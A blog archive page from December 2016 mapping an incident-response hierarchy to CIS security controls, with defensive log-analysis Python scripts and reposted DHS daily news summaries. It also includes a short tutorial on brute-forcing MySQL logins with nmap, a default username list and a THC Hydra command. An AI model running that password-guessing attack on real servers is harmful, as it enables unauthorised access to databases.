Monthly Archives: December 2016

The DFIR Hierarchy of Needs & Critical Security Controls

As you weigh how best to improve your organization's digital forensics and incident response (DFIR) capabilities heading into 2017, consider Matt Swann's Incident Response Hierarchy of Needs. Likely, at some point in your career (or therapy 😉) you've heard reference to Maslow's Hierarchy of Needs. In summary, Maslow's terms, physiological, safety, belongingness & love, esteem, self-actualization, and self-transcendence, describe a pattern that human motivations generally move through, a pattern that is well represented in the form of a pyramid.
Matt has made great use of this model to describe an Incident Response Hierarchy of Needs, through which your DFIR methods should move. I argue that his powerful description of capabilities extends to the whole of DFIR rather than response alone. From Matt's GitHub, "the Incident Response Hierarchy describes the capabilities that organizations must build to defend their business assets. Bottom capabilities are prerequisites for successful execution of the capabilities above them:"

The Incident Response Hierarchy of Needs
"The capabilities may also be organized into plateaus or phases that organizations may experience as they develop these capabilities:"

Hierarchy plateaus or phases
As visualizations, these representations really do speak for themselves, and I applaud Matt's fine work. I would like to propose that a body of references and controls may be of use to you in achieving this hierarchy to its utmost. I also welcome your feedback and contributions regarding how to achieve each of these needs and phases. Feel free to submit controls, tools, and tactics you have or would deploy to be successful in these endeavors; I'll post your submission along with your preferred social media handle.
Aspects of the Center for Internet Security Critical Security Controls Version 6.1 (CIS CSC) can be mapped to each of Matt's hierarchical entities and phases. Below I offer one control and one tool to support each entry. Note that there is a level of subjectivity to these mappings and tooling, but the intent is to help you adopt this thinking and achieve this agenda. Following is an example for each one, starting from the bottom of the pyramid.

INVENTORY - Can you name the assets you are defending?
Critical Security Control #1: Inventory of Authorized and Unauthorized Devices
Family: System
Control: 1.4
"Maintain an asset inventory of all systems connected to the network and the network devices themselves, recording at least the network addresses, machine name(s), purpose of each system, an asset owner responsible for each device, and the department associated with each device. The inventory should include every system that has an Internet protocol (IP) address on the network, including but not limited to desktops, laptops, servers, network equipment (routers, switches, firewalls, etc.), printers, storage area networks, Voice Over-IP telephones, multi-homed addresses, virtual addresses, etc.  The asset inventory created must also include data on whether the device is a portable and/or personal device. Devices such as mobile phones, tablets, laptops, and other portable electronic devices that store or process data must be identified, regardless of whether they are attached to the organization’s network." 
Tool option:
Spiceworks Inventory

TELEMETRY - Do you have visibility across your assets?
Critical Security Control #6: Maintenance, Monitoring, and Analysis of Audit Logs
Family: System
Control: 6.6
"Deploy a SIEM (Security Information and Event Management) or log analytic tools for log aggregation and consolidation from multiple machines and for log correlation and analysis. Using the SIEM tool, system administrators and security personnel should devise profiles of common events from given systems so that they can tune detection to focus on unusual activity, avoid false positives, more rapidly identify anomalies, and prevent overwhelming analysts with insignificant alerts."
Tool option:  
AlienVault OSSIM

DETECTION - Can you detect unauthorized activity?
Critical Security Control #8: Malware Defenses
Family: System
Control: 8.1
"Employ automated tools to continuously monitor workstations, servers, and mobile devices with anti-virus, anti-spyware, personal firewalls, and host-based IPS functionality. All malware detection events should be sent to enterprise anti-malware administration tools and event log servers."
Tool option:
OSSEC Open Source HIDS SECurity

TRIAGE - Can you accurately classify detection results?
Critical Security Control #4: Continuous Vulnerability Assessment and Remediation
Family: System
Control: 4.3
"Correlate event logs with information from vulnerability scans to fulfill two goals. First, personnel should verify that the activity of the regular vulnerability scanning tools is itself logged. Second, personnel should be able to correlate attack detection events with prior vulnerability scanning results to determine whether the given exploit was used against a target known to be vulnerable."
Tool option:
OpenVAS         
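Control 4.3 asks for two things: proof that the scanner itself shows up in the logs, and a way to tell whether a detected attack landed on a target the last scan already knew was vulnerable. The script below is an added example, not from this post, from CIS, or from OpenVAS; the scan export columns, the key=value event line format, the scanner address 10.0.0.2 and the CVE-PLACEHOLDER-n identifiers are all constructed for it.

```python
"""Triage by correlating detection events with prior vulnerability scan results
(CIS CSC 4.3). Added example: the scan export layout, the event line format, the
scanner address and the CVE-PLACEHOLDER-n identifiers are all constructed."""
import csv
import io
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

SCANNER_IP = "10.0.0.2"  # assumed address of the scanning host (constructed)

# Constructed scan export: one row per (host, port) finding; an empty cve column
# still records that the scanner saw the port open.
SCAN_RESULTS_CSV = """\
host,port,cve,severity
10.0.0.5,445,CVE-PLACEHOLDER-1,10.0
10.0.0.5,3306,,5.0
10.0.0.9,80,CVE-PLACEHOLDER-2,7.5
"""

# Constructed detection events in a key=value format of this example's own;
# "cve=-" means the signature carries no CVE reference.
DETECTION_EVENTS = [
    '2016-12-29T10:00:01Z src=203.0.113.7 dst=10.0.0.5 dport=445 sig="SMB exploit attempt" cve=CVE-PLACEHOLDER-1',
    '2016-12-29T10:00:05Z src=203.0.113.7 dst=10.0.0.5 dport=3306 sig="MySQL login brute force" cve=-',
    '2016-12-29T10:00:09Z src=203.0.113.7 dst=10.0.0.9 dport=80 sig="Web RCE attempt" cve=CVE-PLACEHOLDER-9',
    '2016-12-29T10:00:12Z src=203.0.113.7 dst=10.0.0.77 dport=22 sig="SSH brute force" cve=-',
    '2016-12-29T09:30:00Z src=10.0.0.2 dst=10.0.0.5 dport=445 sig="Vulnerability scanner probe" cve=-',
]

EVENT_RE = re.compile(
    r'^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) '
    r'sig="(?P<sig>[^"]*)" cve=(?P<cve>\S+)$'
)


@dataclass
class Finding:
    cve: str
    severity: float


def load_scan_results(csv_text: str) -> Dict[Tuple[str, int], List[Finding]]:
    """Index findings by (host, port); a row without a CVE still marks the port as scanned."""
    index: Dict[Tuple[str, int], List[Finding]] = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        key = (row["host"], int(row["port"]))
        index.setdefault(key, [])
        if row["cve"]:
            index[key].append(Finding(row["cve"], float(row["severity"])))
    return index


def classify(event: str, scan_index: Dict[Tuple[str, int], List[Finding]],
             scanner_ip: str = SCANNER_IP) -> Tuple[str, float]:
    """Return (verdict, priority) for one event. Priority is the scan severity when
    the event's CVE matches a finding on that host/port, otherwise a fixed rank."""
    m = EVENT_RE.match(event)
    if not m:
        return ("UNPARSED", 0.0)
    e = m.groupdict()
    if e["src"] == scanner_ip:
        return ("SCANNER_ACTIVITY", 0.0)      # goal 1: the scanner's own probes are logged
    if e["dst"] not in {host for host, _ in scan_index}:
        return ("TARGET_NOT_SCANNED", 5.0)    # coverage gap: vulnerability state unknown
    findings = scan_index.get((e["dst"], int(e["dport"])))
    if findings is None:
        return ("PORT_NOT_IN_SCAN", 3.0)
    for f in findings:
        if f.cve == e["cve"]:
            return ("KNOWN_VULNERABLE", f.severity)  # goal 2: exploit hit a known-vulnerable target
    return ("SERVICE_OPEN_NO_MATCHING_FINDING", 2.0)


def triage(events: List[str], csv_text: str = SCAN_RESULTS_CSV,
           scanner_ip: str = SCANNER_IP):
    """Rank events highest priority first and report whether scanner activity was seen."""
    scan_index = load_scan_results(csv_text)
    verdicts = [(ev,) + classify(ev, scan_index, scanner_ip) for ev in events]
    verdicts.sort(key=lambda v: v[2], reverse=True)
    scanner_seen = any(v[1] == "SCANNER_ACTIVITY" for v in verdicts)
    return verdicts, scanner_seen


if __name__ == "__main__":
    results, seen = triage(DETECTION_EVENTS)
    print("scanner activity present in event log:", seen)
    for ev, verdict, prio in results:
        print(f"{prio:5.1f} {verdict:34s} {ev}")
```

The TARGET_NOT_SCANNED verdict is deliberately ranked above a non-matching finding: an attack against a host the scanner never covered is an inventory and coverage problem as much as a triage one, which is exactly why this level of the hierarchy sits on top of INVENTORY.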

THREATS - Who are your adversaries? What are their capabilities?
Critical Security Control #19: Incident Response and Management
Family: Application
Control: 19.7
"Conduct periodic incident scenario sessions for personnel associated with the incident handling team to ensure that they understand current threats and risks, as well as their responsibilities in supporting the incident handling team."
Tool option:
Security Incident Response Testing To Meet Audit Requirements

BEHAVIORS - Can you detect adversary activity within your environment?
Critical Security Control #5: Controlled Use of Administrative Privileges
Family: System
Control: 5.1
"Minimize administrative privileges and only use administrative accounts when they are required.  Implement focused auditing on the use of administrative privileged functions and monitor for anomalous behavior."
Tool option: 
Local Administrator Password Solution (LAPS)

HUNT - Can you detect an adversary that is already embedded?
Critical Security Control #6: Maintenance, Monitoring, and Analysis of Audit Logs
Family: System
Control: 6.4
"Have security personnel and/or system administrators run biweekly reports that identify anomalies in logs. They should then actively review the anomalies, documenting their findings."
Tool option:
GRR Rapid Response

TRACK - During an intrusion, can you observe adversary activity in real time?
Critical Security Control #12: Boundary Defense
Family: Network
Control: 12.10
"To help identify covert channels exfiltrating data through a firewall, configure the built-in firewall session tracking mechanisms included in many commercial firewalls to identify TCP sessions that last an unusually long time for the given organization and firewall device, alerting personnel about the source and destination addresses associated with these long sessions."
Tool option:
Bro
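Control 12.10 hinges on "unusually long for the given organization", which means a baseline derived from your own traffic rather than a fixed number. The script below is an added example, not part of this post and not Bro's own code; it reads a small, constructed connection log in the tab-separated, #fields-headed layout that Bro's conn.log uses (only a subset of the columns is included), derives a robust threshold from the median and median absolute deviation of TCP session durations, and reports the source and destination of any session above it.

```python
"""Flag unusually long TCP sessions from a Bro-style conn.log (CIS CSC 12.10).
Added example with a constructed log; the column subset below follows Bro's
conn.log field names but is not a real capture."""
import statistics
from typing import Dict, List, Optional, Tuple

# Constructed records: eight ordinary sessions, one UDP flow, one session with an
# unset duration ("-"), and one day-long TLS session to an external host.
CONN_LOG_ROWS = [
    ("#fields", "ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p", "proto", "service", "duration"),
    ("1483000000.0", "C1", "10.0.0.5", "51000", "198.51.100.10", "443", "tcp", "ssl", "0.8"),
    ("1483000010.0", "C2", "10.0.0.6", "51001", "198.51.100.10", "443", "tcp", "ssl", "1.2"),
    ("1483000020.0", "C3", "10.0.0.7", "51002", "198.51.100.20", "80", "tcp", "http", "2.5"),
    ("1483000030.0", "C4", "10.0.0.5", "51003", "198.51.100.30", "22", "tcp", "ssh", "30.0"),
    ("1483000040.0", "C5", "10.0.0.8", "51004", "198.51.100.10", "443", "tcp", "ssl", "45.0"),
    ("1483000050.0", "C6", "10.0.0.9", "51005", "198.51.100.40", "443", "tcp", "ssl", "60.0"),
    ("1483000060.0", "C7", "10.0.0.5", "51006", "198.51.100.20", "80", "tcp", "http", "90.0"),
    ("1483000070.0", "C8", "10.0.0.6", "51007", "198.51.100.30", "22", "tcp", "ssh", "120.0"),
    ("1483000080.0", "C9", "10.0.0.5", "53", "10.0.0.1", "53", "udp", "dns", "0.01"),
    ("1483000090.0", "C10", "10.0.0.7", "51008", "198.51.100.50", "443", "tcp", "-", "-"),
    ("1483000100.0", "C11", "10.0.0.23", "51009", "203.0.113.9", "443", "tcp", "ssl", "86400.0"),
]
CONN_LOG = "\n".join("\t".join(row) for row in CONN_LOG_ROWS) + "\n"


def parse_conn_log(text: str) -> List[Dict[str, Optional[object]]]:
    """Parse a #fields-headed, tab-separated log into dicts keyed by field name."""
    fields = None
    records = []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
            continue
        if not line or line.startswith("#"):   # other header/footer lines
            continue
        if fields is None:
            raise ValueError("conn.log without a #fields header")
        rec = dict(zip(fields, line.split("\t")))
        rec["duration"] = None if rec["duration"] == "-" else float(rec["duration"])
        records.append(rec)
    return records


def long_session_threshold(durations: List[float], k: float = 5.0, floor: float = 60.0) -> float:
    """Robust baseline: median + k * MAD, never below `floor` seconds."""
    med = statistics.median(durations)
    mad = statistics.median(abs(d - med) for d in durations)
    return max(floor, med + k * mad)


def find_long_tcp_sessions(text: str, k: float = 5.0, floor: float = 60.0) -> Tuple[float, List[dict]]:
    """Return the computed threshold and one alert per TCP session exceeding it."""
    recs = [r for r in parse_conn_log(text) if r["proto"] == "tcp" and r["duration"] is not None]
    threshold = long_session_threshold([r["duration"] for r in recs], k, floor)
    alerts = [
        {"uid": r["uid"], "src": r["id.orig_h"], "sport": int(r["id.orig_p"]),
         "dst": r["id.resp_h"], "dport": int(r["id.resp_p"]), "duration": r["duration"]}
        for r in recs if r["duration"] > threshold
    ]
    return threshold, alerts


if __name__ == "__main__":
    thr, hits = find_long_tcp_sessions(CONN_LOG)
    print(f"threshold: {thr:.1f}s")
    for a in hits:
        print(f"long session {a['uid']}: {a['src']}:{a['sport']} -> {a['dst']}:{a['dport']} ({a['duration']:.0f}s)")
```

On this constructed data the threshold works out to roughly 264 seconds and only C11 is reported. In production, compute the baseline per service (VPN tunnels and database connections are legitimately long-lived) and over a much larger window than eleven records, or the MAD will be dominated by noise.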

ACT - Can you deploy countermeasures to evict and recover?
Critical Security Control #20: Penetration Tests and Red Team Exercises
Family: Application
Control: 20.3
"Perform periodic Red Team exercises to test organizational readiness to identify and stop attacks or to respond quickly and effectively."
Tool option:
Red vs Blue - PowerSploit vs PowerForensics


Can you collaborate with trusted parties to disrupt adversary campaigns?
Critical Security Control #19: Incident Response and Management
Family: Application
Control: 19.5
"Assemble and maintain information on third-party contact information to be used to report a security incident (e.g., maintain an e-mail address of security@organization.com or have a web page http://organization.com/security)."
Tool option:
MISP

I've mapped the hierarchy to the controls in the CIS CSC 6.1 spreadsheet, again based on my experience and perspective; yours may differ, but consider similar activity.

CIS CSC with IR Hierarchy mappings


My full mapping of Matt's Incident Response Hierarchy of Needs in the CIS CSC 6.1 spreadsheet is available here: http://bit.ly/CSC-IRH

I truly hope you familiarize yourself with Matt's Incident Response Hierarchy of Needs and find ways to implement, validate, and improve your capabilities accordingly. Consider that the controls and tools mentioned here are but a starting point and that you have many other options available to you. I look forward to hearing from you regarding your preferred tactics and tools as well. Kudos to Matt for framing this essential discussion so distinctly.

Friday, December 30, 2016



Complete DHS Report for December 30, 2016

Daily Report

Top Stories

• Troy, Michigan-based United Shore Financial Services LLC agreed December 28 to pay $48 million to resolve alleged violations of the False Claims Act by deliberately originating and underwriting federally insured mortgage loans. – U.S. Department of Justice See item 2 below in the Financial Services Sector

• The owner and marketing director of Salon Success Strategies was arrested December 21 in Roseville, California, for allegedly bilking 10 or more of her clients’ customers out of more than $100,000 since 2014. – Sacramento Bee See item 3 below in the Financial Services Sector

• A Romanian citizen pleaded guilty December 28 to stealing $127,000 through skimming devices on bank ATMs in Chatham and Delmar, New York, and in Great Barrington, Massachusetts, between August and October 2015. – Albany Times Union See item 4 below in the Financial Services Sector

• The U.S. President designated December 28 Bears Ears National Monument in Utah, which will span 1.35 million acres of tribal land in the Four Corners region of the State. – Associated Press

15. December 29, Associated Press – (Utah; Nevada) President designates Bears Ears National Monument in Utah. The U.S. President designated December 28 Bears Ears National Monument in Utah, which will span 1.35 million acres of tribal land in the Four Corners region of the State as part of an effort to ensure protections for lands that are home to roughly 100,000 archaeological sites. The U.S. President also designated the Gold Butte National Monument near Las Vegas, which will cover 300,000 acres of ecologically fragile land. Source: http://www.nbc11news.com/content/news/408552945.html

Financial Services Sector

2. December 28, U.S. Department of Justice – (National) United Shore Financial Services LLC agrees to pay $48 million to resolve alleged False Claims Act liability arising from FHA-insured mortgage lending. Troy, Michigan-based United Shore Financial Services LLC (USFS) agreed December 28 to pay $48 million to resolve alleged violations of the False Claims Act by deliberately originating and underwriting mortgage loans insured by the U.S. Department of Housing and Urban Development (HUD)’s Federal Housing Administration (FHA) from January 2006 – December 2011 that did not meet relevant requirements, causing HUD to insure hundreds of loans approved by USFS that were not eligible for FHA mortgage insurance under the Direct Endorsement program. As part of the settlement, USFS admitted it inappropriately pressured underwriters to approve FHA mortgages, and falsely certified that direct endorsement underwriters personally reviewed appraisal reports before USFS approved and endorsed mortgages for FHA insurance, among other violations. Source: https://www.justice.gov/opa/pr/united-shore-financial-services-llc-agrees-pay-48-million-resolve-alleged-false-claims-act

3. December 28, Sacramento Bee – (International) Roseville police: Woman ran up fraudulent credit card charges of salon, day spa customers. The owner and marketing director of Salon Success Strategies was arrested December 21 in Roseville, California, for allegedly bilking 10 or more of her clients’ customers in California, Florida, Canada, and Australia out of more than $100,000 by fraudulently charging their credit cards since 2014.

4. December 28, Albany Times Union – (Massachusetts; New York) Feds: ATM skimmer admits stealing $127,000. A Romanian citizen pleaded guilty December 28 to stealing $127,000 through skimming devices he and a co-conspirator installed on ATMs at First Niagara Bank, TrustCo Bank, and Berkshire Bank branches in Chatham and Delmar, New York, and in Great Barrington, Massachusetts, between August and October 2015. Source: http://www.timesunion.com/local/article/Feds-ATM-skimmer-admits-stealing-127-000-10823421.php

For another story, see item 18 below from the Commercial Facilities Sector

18. December 29, SecurityWeek – (National) InterContinental Hotels investigating possible card breach. InterContinental Hotels Group PLC (IHG) announced December 29 it is investigating a possible payment card breach at some of its U.S. locations after the firm was notified of a report of unauthorized charges occurring on customers’ debit and credit cards that were used at the company’s properties. IHG officials advised customers to monitor their payment card statements until the investigation is completed.

Information Technology Sector

16. December 28, SecurityWeek – (International) Destructive KillDisk malware turns into ransomware. A CyberX security researcher reported that a recently observed variant of the KillDisk malware encrypts each file with its own Advanced Encryption Standard (AES) key, encrypts those AES keys in turn with an RSA 1028 key stored in the body of the malware, and holds the files for ransom instead of deleting them. The ransomware is designed to encrypt select types of files, including source code, emails and media files, and documents, among other file types, and requires elevated privileges.

17. December 28, SecurityWeek – (International) Vulnerabilities plague PHP 7’s unserialize mechanism. Check Point security researchers reported that PHP 7’s unserialize function is plagued with three vulnerabilities that can be exploited to read memory, forge objects, and achieve code execution on the impacted server. The researchers found that the first two flaws could enable a malicious actor to take total control of the affected server, while the third flaw can be used to create a denial-of-service (DoS) attack.
Source: http://www.securityweek.com/vulnerabilities-plague-php-7s-unserialize-mechanism

For another story, see item 13 below from the Healthcare and Public Health Sector

13. December 29, SecurityWeek – (National) FDA releases guidance for medical device cybersecurity. The U.S. Food and Drug Administration (FDA) released December 29 guidance on the management of cybersecurity risks for medical devices after they have been deployed on a patient’s home network, in a patient’s body, or on a hospital’s network, which advises medical device manufacturers to establish and maintain a process for detecting cybersecurity holes in their devices, evaluating and controlling the associated risks, and deploying hardware and software patches and updates before the vulnerabilities are exploited. The guidance states that manufacturers do not need to report the vulnerabilities to the FDA unless they result in patient death or other adverse events, or cannot be patched within 60 days.

Communications Sector

Nothing to report

Thursday, December 29, 2016



Complete DHS Report for December 29, 2016

Daily Report

Top Stories

• An operator at PDC Capital Group, LLC was charged December 27 after he allegedly used the firm to defraud investors in China into investing $72 million in EB-5 projects. – U.S. Securities and Exchange Commission See item 3 below in the Financial Services Sector

• Port Huron, Michigan officials reported that approximately 5,000 gallons of combined wastewater overflowed into the Black River December 26. – Port Huron Times Herald

11. December 28, Port Huron Times Herald – (Michigan) Wastewater discharges into Black River. The Port Huron Wastewater Treatment Plant in Michigan reported that approximately 5,000 gallons of combined wastewater, including roughly 500 gallons of sanitary wastewater, overflowed into the Black River by Riverside Drive at McPherson Street December 26. Source: http://www.thetimesherald.com/story/news/local/port-huron/2016/12/28/wastewater-discharges-into-black-river/95907174/

• Officials announced December 27 that the personal information of 15,000 people may have been compromised after a former patient at the New Hampshire Hospital in Concord accessed the information and posted it on the Internet in October 2015. – Associated Press

12. December 27, Associated Press – (New Hampshire) New Hampshire psychiatric patient accused of data breach. The commissioner of the New Hampshire Department of Health and Human Services announced December 27 that the personal information of 15,000 people who have received department services may have been compromised after a former patient at the New Hampshire Hospital in Concord accessed the information using a computer in the facility’s library and posted it on the Internet in October 2015. There is no evidence that the data was misused or that banking information was accessed during the breach. Source: http://www.dailyprogress.com/new-hampshire-psychiatric-patient-accused-of-data-breach/article_8b048ffe-abd5-5d6e-8854-d874962d9125.html

• The former treasurer of Ballard County, Kentucky, pleaded guilty December 27 for her role in a scheme where she obtained roughly $450,000 in bank loans without authorization from the county’s Fiscal Court. – Glasgow Daily Times

13. December 28, Glasgow Daily Times – (Kentucky) Former Ballard County treasurer guilty of bank and wire fraud. The former treasurer of Ballard County, Kentucky, pleaded guilty December 27 for her role in a scheme where she obtained roughly $450,000 in bank loans using a $500,000 Ballard County Certificate of Deposit as collateral without authorization from the county’s Fiscal Court and deceived the court about the loans by failing to report the loans and concealing the loan’s proceeds. The former treasurer also routinely wrote checks to herself for fraudulent medical reimbursement payments that totaled more than $27,000.
Source: http://www.glasgowdailytimes.com/community/former-ballard-county-treasurer-guilty-of-bank-and-wire-fraud/article_c22bff08-5be4-5935-88c9-e52e022f1031.html

Financial Services Sector

3. December 27, U.S. Securities and Exchange Commission – (International) SEC charges lawyer with stealing investor money in EB-5 offerings. A California-based attorney and operator of marketing firm PDC Capital Group, LLC was charged December 27 after he allegedly used PDC Capital to defraud investors in China into investing $72 million in several EB-5 immigrant investor program projects, which included opening Caffe Primo restaurants and developing assisted living facilities, among other projects, and then outright stole at least $9.6 million to fund his own businesses and personal expenses despite his supposed awareness that his actions would violate Federal regulations and jeopardize the visas of the foreign investors. Source: https://www.sec.gov/news/pressrelease/2016-281.html

For another story, see item 13 above in Top Stories

Information Technology Sector

16. December 27, SecurityWeek – (International) IBM reports significant increase in ICS attacks. IBM Managed Security Services reported that the number of attacks targeting industrial control systems (ICS) increased by 110 percent in 2016 compared to 2015 due to brute force attacks on supervisory control and data acquisition (SCADA) systems. IBM stated that the U.S. was both the top destination and top source of ICS attacks observed since the beginning of 2016, with nearly 90 percent of ICS attacks targeting the U.S. and 60 percent coming from the U.S.

Communications Sector

17. December 28, SecurityWeek – (International) “Switcher” Android trojan hacks routers, hijacks traffic. Kaspersky Lab researchers discovered an Android trojan, dubbed Switcher, that is disguised as an Android client for the Chinese search engine Baidu and as a Chinese app for sharing Wi-Fi network details. Once installed, it guesses the username and password of the router the infected Android device is connected to in order to hack the router and replace the device’s primary and secondary Domain Name System (DNS) servers with Internet Protocol (IP) addresses leading to rogue DNS servers, redirecting traffic to a malicious Website. The researchers warned that Switcher targets the entire network and exposes all users to a variety of secondary attacks.

How to brute force a MySQL DB

There are many articles on how to use Metasploit or some other mighty tool, which is fine if you work with it all day. But if you have just found a MySQL server on an appliance listening in your network and need to do a quick, small security check, there is something easier. First find the MySQL server and check the version; maybe there is an exploit available and you don’t need to try passwords at all. The first choice for this is nmap: install it with sudo apt-get install nmap and call it like this:

# nmap -sV -O <IP>

Starting Nmap 7.01 ( https://nmap.org ) at 2016-xx-xx xx:xx CET
Nmap scan report for hostname (<IP>)
Host is up (0.020s latency).
Not shown: 986 closed ports
PORT STATE SERVICE VERSION
....
3306/tcp open mysql MySQL 5.6.33-79.0-log
....
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: x hops

You need to call it as root with these options. -sV shows the versions of the listening services and -O guesses the operating system. For brute forcing we need three things:

  • a list of usernames to try
  • a list of passwords to try
  • a software that does the trying

The first is quite easy, as the default users are well known and you may know something about the system, such as the software or vendor name, or the downloadable online manual may simply state the username. So let’s write the file:

$ cat > usernames.txt
admin
root
mysql
db
test
user

Now we need a list of likely passwords. Sure, we could think up some of our own, but it is easier to download them. A good source is Skull Security. Choose your list, download it, and extract it with bunzip2 xxxxx.txt.bz2. Now we only need the software. We’ll use THC Hydra, but you don’t need to download and compile it, as Ubuntu ships with it: just type sudo apt-get install hydra. Now we just need to call it.

$ hydra -L usernames.txt -P xxxxx.txt <ip> mysql
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-12-29 14:19:38
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 64 tasks, 86066388 login tries (l:6/p:14344398), ~336196 tries per task
[DATA] attacking service mysql on port 3306
[STATUS] 833.00 tries/min, 833 tries in 00:01h, 86065555 todo in 1721:60h, 4 active
.....

I think this password list is too long 😉 Choose a shorter one 😉
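Seen from the server side, a run like the one above leaves a dense trail of failed logins in the MySQL error log, and the [INFO] line about MySQL disliking many parallel connections hints at why the pattern is so visible. The script below is an added example, not part of this post and not Hydra's or MySQL's own code: it parses "Access denied for user" lines in both the MySQL 5.6 and the 5.7-style timestamp format, counts failures per source host in a sliding window, and raises an alert once a host exceeds a threshold. The log lines are constructed, and the example assumes the server is configured to log access-denied errors at all (log_warnings=2 on 5.6).

```python
"""Detect MySQL login brute forcing from the error log. Added example with a
constructed log; it assumes the server logs "Access denied" events (on MySQL 5.6
that requires log_warnings=2) and tolerates both 5.6 and 5.7 timestamp styles."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed error log: a burst of eight failures from 10.0.0.23 in a few seconds,
# two isolated failures from 10.0.0.50 minutes apart, and an unrelated [Note] line.
SAMPLE_ERROR_LOG = """\
2016-12-29 14:19:38 2745 [Note] Server socket created on IP: '0.0.0.0'.
2016-12-29 14:19:40 2746 [Warning] Access denied for user 'admin'@'10.0.0.23' (using password: YES)
2016-12-29 14:19:40 2747 [Warning] Access denied for user 'root'@'10.0.0.23' (using password: YES)
2016-12-29 14:19:41 2748 [Warning] Access denied for user 'mysql'@'10.0.0.23' (using password: YES)
2016-12-29 14:19:41 2749 [Warning] Access denied for user 'db'@'10.0.0.23' (using password: YES)
2016-12-29 14:19:42 2750 [Warning] Access denied for user 'test'@'10.0.0.23' (using password: YES)
2016-12-29 14:19:42 2751 [Warning] Access denied for user 'user'@'10.0.0.23' (using password: YES)
2016-12-29 14:19:43 2752 [Warning] Access denied for user 'admin'@'10.0.0.23' (using password: YES)
2016-12-29 14:19:44 2753 [Warning] Access denied for user 'root'@'10.0.0.23' (using password: YES)
2016-12-29 14:25:10 2790 [Warning] Access denied for user 'app'@'10.0.0.50' (using password: YES)
2016-12-29T14:30:01.123456Z 2801 [Note] Access denied for user 'app'@'10.0.0.50' (using password: NO)
"""

# Matches "YYYY-MM-DD HH:MM:SS" (5.6) and "YYYY-MM-DDTHH:MM:SS.ffffffZ" (5.7+),
# then skips the thread id and severity tag before the access-denied text.
DENIED_RE = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2})[ T](?P<time>\d{2}:\d{2}:\d{2})\S*\s.*?"
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'"
)


def parse_denials(log_text: str) -> List[Tuple[datetime, str, str]]:
    """Return (timestamp, source host, attempted user) for every access-denied line."""
    events = []
    for line in log_text.splitlines():
        m = DENIED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["date"] + " " + m["time"], "%Y-%m-%d %H:%M:%S")
        events.append((ts, m["host"], m["user"]))
    return events


def detect_bruteforce(log_text: str, threshold: int = 5, window_seconds: int = 60) -> Dict[str, dict]:
    """Alert on any source host with >= threshold failures inside a sliding window.
    The alert records the densest window found for that host and the set of
    usernames tried in it, which distinguishes a single-account guess from a spray."""
    by_host: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, host, user in parse_denials(log_text):
        by_host[host].append((ts, user))
    window = timedelta(seconds=window_seconds)
    alerts: Dict[str, dict] = {}
    for host, evs in by_host.items():
        evs.sort()
        best, best_span, left = 0, (0, 0), 0
        for right in range(len(evs)):
            while evs[right][0] - evs[left][0] > window:   # slide the left edge forward
                left += 1
            if right - left + 1 > best:
                best, best_span = right - left + 1, (left, right)
        if best >= threshold:
            lo, hi = best_span
            alerts[host] = {
                "failures": best,
                "users": sorted({u for _, u in evs[lo:hi + 1]}),
                "first": evs[lo][0],
                "last": evs[hi][0],
            }
    return alerts


if __name__ == "__main__":
    for host, a in detect_bruteforce(SAMPLE_ERROR_LOG).items():
        print(f"{host}: {a['failures']} failures between {a['first']} and {a['last']}, users tried: {a['users']}")
```

The thresholds are deliberately modest: an interactive user mistypes a password once or twice, not eight times across six accounts in four seconds. Feeding these alerts to the SIEM described under TELEMETRY above, restricting accounts to the hosts that actually need them ('app'@'10.0.0.%' rather than 'app'@'%'), and not exposing port 3306 beyond the hosts that need it remove most of the attack surface this post's quick check is looking for.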

Wednesday, December 28, 2016



Complete DHS Report for December 28, 2016

Daily Report

Top Stories

• Texas Best Proteins (Farm to Market Foods) issued a recall December 24 for approximately 25,332 pounds of its Dirty Rice products due to misbranding and undeclared peanuts. – U.S. Department of Agriculture

15. December 25, U.S. Department of Agriculture – (Texas) Texas Best Proteins recalls Cajun Style Dirty Rice containing chicken products and Turkey Cajun Dinner Kits containing Dirty Rice due to misbranding and undeclared allergens. Texas Best Proteins (Farm to Market Foods) issued a recall December 24 for approximately 25,332 pounds of its Cajun Style Dirty Rice containing chicken products and its Turkey Cajun Dinner Kits containing Dirty Rice products due to misbranding and undeclared peanuts after the company was notified by its supplier that the Worcestershire sauce used in the rice product was recalled as the sauce may contain peanut, which is not listed on the product label. There have been no confirmed reports of adverse reactions and the products were shipped to retail outlets in Texas. Source: https://www.fsis.usda.gov/wps/portal/fsis/topics/recalls-and-public-health-alerts/recall-case-archive/archive/2016/recall-122-2016-release

• Officials reported that a malfunction at the Lake Creek Lift Station in Austin, Texas, caused around 50,000 gallons of wastewater to overflow December 24. – Austin American-Statesman

18. December 24, Austin American-Statesman – (Texas) About 50,000 gallons of wastewater overflow in northwest Austin. Austin Water Utility officials reported that a malfunction at the Lake Creek Lift Station in Austin, Texas, caused around 50,000 gallons of wastewater to overflow December 24. Officials stated that none of the spillage went into the creek and the overflow did not impact the city’s drinking water supply. Source: http://www.statesman.com/news/local/about-000-gallons-wastewater-overflow-northwest-austin/bzVY6a11dhICchrfk96hON/

• Officials reached a roughly $40 million settlement December 23 to resolve claims against around 100 potentially responsible parties for the cleanup of the Peterson/Puritan, Inc. Superfund Site in Cumberland and Lincoln, Rhode Island. – U.S. Environmental Protection Agency

